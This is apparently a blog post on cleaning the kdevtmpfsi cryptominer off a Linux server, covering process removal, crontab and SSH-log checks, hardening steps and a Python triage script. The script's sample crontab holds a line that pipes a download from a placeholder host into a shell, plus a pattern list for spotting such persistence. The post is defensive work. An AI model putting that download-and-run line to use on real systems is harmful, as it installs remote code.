Symptoms
The server's CPU usage had been stuck at 100%. Looking at the output of the top command, I found a suspicious process named kdevtmpfsi. A Google search showed that it is a cryptocurrency-mining malware.
Investigation methods
Step 1: Look at the kdevtmpfsi process with the command ps -ef | grep kdevtmpfsi, see below.
Note: After finding the kdevtmpfsi process ID with ps -ef, you can kill -9 that process ID directly and delete the /tmp/kdevtmpfsi executable. But the process was back within a minute, which suggests that kdevtmpfsi has a daemon or a scheduled task behind it. Check for suspicious scheduled tasks with crontab -l.
Step 2: From the output above, the kdevtmpfsi process ID was 10393. Running systemctl status 10393 showed that kdevtmpfsi had a daemon process, see below.
Step 3: Kill the kdevtmpfsi daemon with kill -9 30903 30904, then kill the mining malware itself with killall -9 kdevtmpfsi, and finally delete the kdevtmpfsi executable with rm -f /tmp/kdevtmpfsi.
Post-mortem
- Use find / -name "*kdevtmpfsi*" to search for any remaining kdevtmpfsi files.
- Review the Linux SSH login audit logs. On CentOS and Red Hat the log is /var/log/secure; on Ubuntu and Debian it is /var/log/auth.log.
- Check crontab for suspicious scheduled tasks.
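The two checks that mattered in this incident, finding the parent (daemon) of the miner rather than only the miner, and spotting a cron entry that re-downloads it, can be scripted for triage. The following is an added example, not code from the original article; it parses constructed ps -ef and crontab text, and the parent process path, PIDs and URL in the samples are hypothetical.

```python
import re
from typing import Dict, List

# Constructed sample of `ps -ef` output (not captured from a real host).
# The parent command path is a hypothetical placeholder.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan01 ?        00:00:03 /sbin/init
root     30903     1  0 10:15 ?        00:00:00 /tmp/parent-daemon
root     10393 30903 99 10:16 ?        00:12:41 /tmp/kdevtmpfsi
www-data  2201     1  0 Jan01 ?        00:00:10 php-fpm: pool www
"""

# Constructed crontab listing; the download-and-pipe-to-shell entry uses a
# hypothetical URL and is the shape of persistence the article describes.
SAMPLE_CRON = """\
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://example.invalid/pg.sh | sh
"""

# Patterns a defender would flag in a crontab: piping a download into a
# shell, running out of world-writable temp dirs, or decoding a payload.
CRON_PATTERNS = [r"curl[^|]*\|\s*(ba)?sh", r"wget[^|]*\|\s*(ba)?sh",
                 r"/tmp/", r"/dev/shm/", r"base64\s+-d"]


def find_process_tree(ps_output: str, name: str) -> List[Dict]:
    """Return each process whose command contains `name`, with its parent.
    Killing only the child is what let the miner respawn in the article."""
    rows: Dict[int, Dict] = {}
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 7)          # CMD keeps its own spaces
        if len(parts) < 8:
            continue
        uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
        rows[int(pid)] = {"pid": int(pid), "ppid": int(ppid), "uid": uid, "cmd": cmd}
    hits = []
    for proc in rows.values():
        if name in proc["cmd"]:
            parent = rows.get(proc["ppid"])
            hits.append({"pid": proc["pid"], "cmd": proc["cmd"],
                         "parent_pid": proc["ppid"],
                         "parent_cmd": parent["cmd"] if parent else None})
    return hits


def suspicious_cron_entries(crontab: str) -> List[str]:
    """Return non-comment crontab lines matching any suspicious pattern."""
    return [ln for ln in crontab.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")
            and any(re.search(p, ln) for p in CRON_PATTERNS)]
```

On a live host, feed it the real output of ps -ef and crontab -l (for every user, not just root) and kill the parent PID before the miner itself.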
Follow-up protection
- Enable SSH public-key login and disable password authentication.
- Cloud hosts: tighten the security-group policy. Inbound traffic normally only needs ports 80 and 443 open; outbound traffic is not restricted by default, but limit it if there is a need.
- Physical machines: use a hardware firewall, or iptables on the machine itself, to configure inbound traffic rules.
- If this machine does not need to provide services directly, it can refuse all inbound traffic from outside the LAN, and the business machines on the internal network are reached through a jump host.
- Build the capability to run security scanning, and regularly check machines for vulnerabilities and fix them.
Summary: The measures above are incomplete. They are only a starting point; additional measures must be combined with your own business situation, otherwise they are empty talk.
This article was published by the YP site!